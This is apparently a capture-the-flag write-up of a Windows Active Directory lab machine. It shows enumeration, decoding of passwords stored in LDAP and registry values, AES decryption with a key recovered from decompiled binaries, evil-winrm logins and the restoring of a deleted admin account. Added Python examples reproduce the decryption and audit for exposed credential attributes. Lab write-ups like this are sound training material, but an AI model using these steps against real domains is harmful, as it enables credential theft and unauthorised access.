This is my write-up for the Cascade box, a Windows machine. I had some difficulties with it since I am not that strong with Windows, but I learned new things. Let's dive in.
First of all, I scan for open ports with nmap. The output:
```
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-04-01 15:35:14Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
```
Several of these services belong to Active Directory: Kerberos, LDAP and SMB. First I use enum4linux to collect possible usernames and groups, information that is readable from LDAP.
```
Users:
Group 'Domain Users' (RID: 513) has member: CASCADE\administrator
Group 'Domain Users' (RID: 513) has member: CASCADE\krbtgt
Group 'Domain Users' (RID: 513) has member: CASCADE\arksvc
Group 'Domain Users' (RID: 513) has member: CASCADE\s.smith
Group 'Domain Users' (RID: 513) has member: CASCADE\r.thompson
Group 'Domain Users' (RID: 513) has member: CASCADE\util
Group 'Domain Users' (RID: 513) has member: CASCADE\j.wakefield
Group 'Domain Users' (RID: 513) has member: CASCADE\s.hickson
Group 'Domain Users' (RID: 513) has member: CASCADE\j.goodhand
Group 'Domain Users' (RID: 513) has member: CASCADE\a.turnbull
Group 'Domain Users' (RID: 513) has member: CASCADE\e.crowe
Group 'Domain Users' (RID: 513) has member: CASCADE\b.hanson
Group 'Domain Users' (RID: 513) has member: CASCADE\d.burman
Group 'Domain Users' (RID: 513) has member: CASCADE\BackupSvc
Group 'Domain Users' (RID: 513) has member: CASCADE\j.allen
Group 'Domain Users' (RID: 513) has member: CASCADE\i.croft
```
I now have a list of usernames and a list of groups. I try each of these usernames with a null (empty) password against SMB on port 445, but none of them works. At this point I install and open a GUI tool called jxplorer, which lets me browse LDAP easily. I enter the host IP and look for interesting information in the user attributes.
User r.thompson has an attribute named CascadeLegacyPwd; the trailing = suggests base64 padding. Decoding it gives the password for that user.
```
echo -n "clk0bjVldmE=" | base64 -d
rY4n5eva
```
Let's use smbclient with the username and password we have to test whether we can log in to SMB.
```
smbclient -L //10.10.10.182 -U r.thompson
Enter WORKGROUP\r.thompson's password: rY4n5eva

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Audit$          Disk
        C$              Disk      Default share
        Data            Disk
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        print$          Disk      Printer Drivers
        SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available
```
I try to access Audit$ but don't have permission, so I try Data:
```
kali@kali:~/Desktop/Boxes/Cascade/Nmap$ smbclient //10.10.10.182/Audit$ -U r.thompson
Enter WORKGROUP\r.thompson's password:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit
kali@kali:~/Desktop/Boxes/Cascade/Nmap$ smbclient //10.10.10.182/Data -U r.thompson
Enter WORKGROUP\r.thompson's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jan 26 22:27:34 2020
  ..                                  D        0  Sun Jan 26 22:27:34 2020
  Contractors                         D        0  Sun Jan 12 20:45:11 2020
  Finance                             D        0  Sun Jan 12 20:45:06 2020
  IT                                  D        0  Tue Jan 28 13:04:51 2020
  Production                          D        0  Sun Jan 12 20:45:18 2020
  Temps                               D        0  Sun Jan 12 20:45:15 2020

                13106687 blocks of size 4096. 7797938 blocks available
smb: \>
```
I was able to pull these files from the share.
```
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ ls
ArkAdRecycleBin.log  dcdiag.log  Meeting_Notes_June_2018.html  'VNC Install.reg'
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$
```
The file ArkAdRecycleBin.log contains logs from a program called Ark AD Recycle Bin. Looking closely, two objects get deleted, and the command runs as the user ArkSvc. Maybe we can restore these objects?
The file dcdiag.log contains the following:
As its header says, this is output from a domain controller diagnosis, but there was nothing useful to me in this file.
The next file, Meeting_Notes_June_2018.html:
From this file I get the following info:
A new server is going live on Wednesday.
They will be using a temporary account, which will be deleted at the end of 2018. The username is TempAdmin and the password is the same as the normal admin account's.
Looking at the ArkAdRecycleBin.log file, we can see the user TempAdmin getting deleted on 8/12/2018, the day after Wednesday. We keep this in mind.
The last file is VNC Install.reg:
As the extension says, this is an export from the registry. It contains a Password value stored as hex. Searching for this, I find a tool that can decode the password: vncpasswd.py.
```
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ git clone https://github.com/trinitronx/vncpasswd.py.git vncpasswd.py
Cloning into 'vncpasswd.py'...
remote: Enumerating objects: 26, done.
remote: Counting objects: 100% (26/26), done.
remote: Compressing objects: 100% (22/22), done.
remote: Total 287 (delta 10), reused 13 (delta 4), pack-reused 261
Receiving objects: 100% (287/287), 87.94 KiB | 526.00 KiB/s, done.
Resolving deltas: 100% (144/144), done.
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ cd vncpasswd.py
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ ./vncpasswd.py -d -H "6bcf2a4b6e5aca0f"
Cannot read from Windows Registry on a Linux system
Cannot write to Windows Registry on a Linux system
Decrypted Bin Pass= 'sT333ve2'
Decrypted Hex Pass= '7354333333766532'
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$
```
This gives the password sT333ve2. At this point I run nmap again to check whether WinRM is open.
```
kali@kali:~$ nmap -Pn -p 5985,5986 10.10.10.182
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 19:27 EDT
Nmap scan report for 10.10.10.182
Host is up (0.069s latency).

PORT     STATE    SERVICE
5985/tcp open     wsman
5986/tcp filtered wsmans

Nmap done: 1 IP address (1 host up) scanned in 1.77 seconds
kali@kali:~$
```
I first try this password with the user s.smith (name taken from the enum4linux output), who was also mentioned in Meeting_Notes_June_2018.html.
I am logged in as s.smith now and can read user.txt as well. After poking around the box I can't find much, so I go back and check whether I can access the SMB share with the new user's credentials.
```
smbclient //10.10.10.182/Audit$ -U s.smith
Enter WORKGROUP\s.smith's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 29 13:01:26 2020
  ..                                  D        0  Wed Jan 29 13:01:26 2020
  CascAudit.exe                       A    13312  Tue Jan 28 16:46:51 2020
  CascCrypto.dll                      A    12288  Wed Jan 29 13:00:20 2020
  DB                                  D        0  Tue Jan 28 16:40:59 2020
  RunAudit.bat                        A       45  Tue Jan 28 18:29:47 2020
  System.Data.SQLite.dll              A   363520  Sun Oct 27 02:38:36 2019
  System.Data.SQLite.EF6.dll          A   186880  Sun Oct 27 02:38:38 2019
  x64                                 D        0  Sun Jan 26 17:25:27 2020
  x86                                 D        0  Sun Jan 26 17:25:27 2020

                13106687 blocks of size 4096. 7796325 blocks available
smb: \>
```
I can access Audit$, which contains an .exe, a DLL that seems to go with it, a DB folder and some other .dll files. Inside DB there is a file named Audit.db.
```
kali@kali:~/Desktop/Boxes/Cascade/smbshare/$ file Audit.db
Audit.db: SQLite 3.x database, last written using SQLite version
```
I open the file with a SQLite database browser. Inside the Ldap table I find a base64 string, but decoding it gives nothing readable. It seems to belong to a user named ArkSvc, who may be related to the ArkAdRecycleBin log seen earlier.
Looking into RunAudit.bat, I see it refers to the executable.
Maybe the password is encrypted by the executable we saw earlier. I am going to use AvaloniaILSpy (you can also use dotPeek if you prefer to switch to a Windows box). I open the executable and look for the main function, since that is where every program starts. In the main program I find something interesting: a decryption step, password = Crypto.DecryptString(encryptedString, "c4scadek3y654321"); which also gives me a string constant. Since Crypto.DecryptString seems to live in the DLL, I load that next and find the decryption function there, along with an IV and the algorithm, which is AES in CBC mode.
I now have the following extracted:
Encrypted password: BQO5l5Kj9MdErXx6Q6AGOw==
IV: 1tdyjCbY1Ix49842
Key: c4scadek3y654321
Using this website, I decrypt the password from its base64-encoded form.
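The decryption can be reproduced offline, which makes the defensive point clearer: because the key and IV are compiled into CascAudit.exe and CascCrypto.dll, anyone who can read the Audit$ share also holds everything needed to turn the blob in Audit.db back into the password, so the "encryption" is only obfuscation. The following is an added example, not code from the write-up or from the CascAudit tool; it assumes the `cryptography` package is installed and that the tool used PKCS7 padding (the .NET default), which the write-up does not state explicitly.

```python
import base64

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# Values recovered from the decompiled binaries in the write-up.
# Both are static in the shipped files, which is the weakness being illustrated.
EMBEDDED_KEY = b"c4scadek3y654321"  # hard-coded in CascAudit.exe
EMBEDDED_IV = b"1tdyjCbY1Ix49842"   # hard-coded in CascCrypto.dll


def decrypt_with_embedded_key(b64_ciphertext, key=EMBEDDED_KEY, iv=EMBEDDED_IV):
    """AES-128-CBC decryption with a static key/IV, as the audit tool does.

    The ciphertext is stored base64-encoded in Audit.db. PKCS7 padding is an
    assumption (the .NET default); a wrong key or padding raises ValueError
    instead of silently returning garbage.
    """
    ciphertext = base64.b64decode(b64_ciphertext)
    decryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = decryptor.update(ciphertext) + decryptor.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    plaintext = unpadder.update(padded) + unpadder.finalize()
    return plaintext.decode("utf-8")


def is_static_key_material(key, iv):
    """Flag the pattern a code reviewer should reject: a fixed, printable key
    and IV that ship with the binary instead of being fetched at runtime from
    a secret store (DPAPI, a managed service account, or a vault)."""
    return key.isascii() and iv.isascii() and len(key) in (16, 24, 32)


if __name__ == "__main__":
    # The blob from the Ldap table of Audit.db, as shown in the write-up.
    print(decrypt_with_embedded_key("BQO5l5Kj9MdErXx6Q6AGOw=="))
    print("static key material:", is_static_key_material(EMBEDDED_KEY, EMBEDDED_IV))
```

The fix on the defender's side is not a stronger cipher but removing the shared secret from the artifact: let the audit job run under a group managed service account, or protect the stored credential with DPAPI so that only the intended account on the intended host can decrypt it.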
I now log in with evil-winrm as the user ArkSvc with the password w3lc0meFr31nd. Next, as ArkAdRecycleBin.log suggests, I try to restore the deleted accounts, because they should still be in the Recycle Bin, right?
The output includes cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz, which base64-decodes to the cleartext password baCT3r1aN00dles.
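Both credential leaks in this box (the CascadeLegacyPwd attribute on r.thompson found through jxplorer, and the same attribute surviving on the deleted TempAdmin object in the Recycle Bin) come from the same misconfiguration: a custom directory attribute holding an encoded password, readable by any authenticated user, and retained on tombstoned objects. An audit that scans user objects for non-standard attributes whose values decode to readable text catches both. The following is an added example, not code from the write-up; the entry layout (one dict per object, with `isDeleted` marking recycled objects) and the short list of well-known attributes are assumptions for running it offline, and the sample entries are constructed from the values the write-up shows.

```python
import base64
import string

# Constructed sample entries modelled on what the write-up found. The attribute
# values are the ones shown in the write-up; the dict layout is an assumption.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "r.thompson", "isDeleted": False,
     "cascadeLegacyPwd": "clk0bjVldmE=", "description": "Finance"},
    {"sAMAccountName": "TempAdmin", "isDeleted": True,
     "cascadeLegacyPwd": "YmFDVDNyMWFOMDBkbGVz"},
    {"sAMAccountName": "s.smith", "isDeleted": False,
     "description": "Sales", "userPrincipalName": "s.smith@cascade.local"},
]

# Attributes expected on a user object; anything else is a custom or legacy
# attribute worth inspecting. Deliberately short for this example.
WELL_KNOWN_ATTRIBUTES = {"sAMAccountName", "isDeleted", "description",
                         "userPrincipalName"}

PRINTABLE = set(string.printable) - set("\x0b\x0c")


def looks_like_secret(value):
    """Return the decoded text if `value` is strict base64 that decodes to
    printable ASCII (the pattern of a password 'hidden' by encoding in a
    directory attribute), otherwise None."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (ValueError, TypeError):  # binascii.Error is a ValueError subclass
        return None
    if not raw:
        return None
    text = raw.decode("ascii", errors="replace")  # non-ASCII becomes U+FFFD
    return text if all(ch in PRINTABLE for ch in text) else None


def find_exposed_credential_attributes(entries, include_deleted=True):
    """Scan directory entries for non-standard attributes whose value decodes
    to readable text. Returns (account, attribute, decoded, is_deleted) tuples.

    Recycled objects keep their attributes, so they are included by default;
    an audit that skips them would miss the TempAdmin case from the write-up.
    """
    findings = []
    for entry in entries:
        deleted = bool(entry.get("isDeleted"))
        if deleted and not include_deleted:
            continue
        for attr, value in entry.items():
            if attr in WELL_KNOWN_ATTRIBUTES or not isinstance(value, str):
                continue
            decoded = looks_like_secret(value)
            if decoded is not None:
                findings.append((entry["sAMAccountName"], attr, decoded, deleted))
    return findings


if __name__ == "__main__":
    for account, attr, decoded, deleted in find_exposed_credential_attributes(SAMPLE_ENTRIES):
        state = "DELETED" if deleted else "live"
        print(f"{account:12} {attr:18} {state:8} {len(decoded)}-char readable value")
```

In a real environment the entries would come from an LDAP search that includes deleted objects; the remediation is to clear the attribute on live and recycled objects alike, rotate the exposed passwords, and review who holds membership in the group that grants Recycle Bin read access.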
I use evil-winrm again, this time as Administrator (as Meeting_Notes_June_2018.html says, TempAdmin has the same password as the admin).
Trying to log in as TempAdmin does nothing, since that user is deleted. As Administrator I restore the object with Get-ADObject -Filter {SamAccountName -eq 'TempAdmin'} -IncludeDeletedObjects | Restore-ADObject and try to log in again, but it still fails. Checking the groups TempAdmin belongs to, the user is not in Remote Management Users. After adding the user to that group, I can log in as TempAdmin as well.
```
*Evil-WinRM* PS C:\Users\Administrator\Documents> net user TempAdmin
User name                    TempAdmin
Full Name                    TempAdmin
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            27/01/2020 04:23:08
Password expires             Never
Password changeable          27/01/2020 04:23:08
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.
```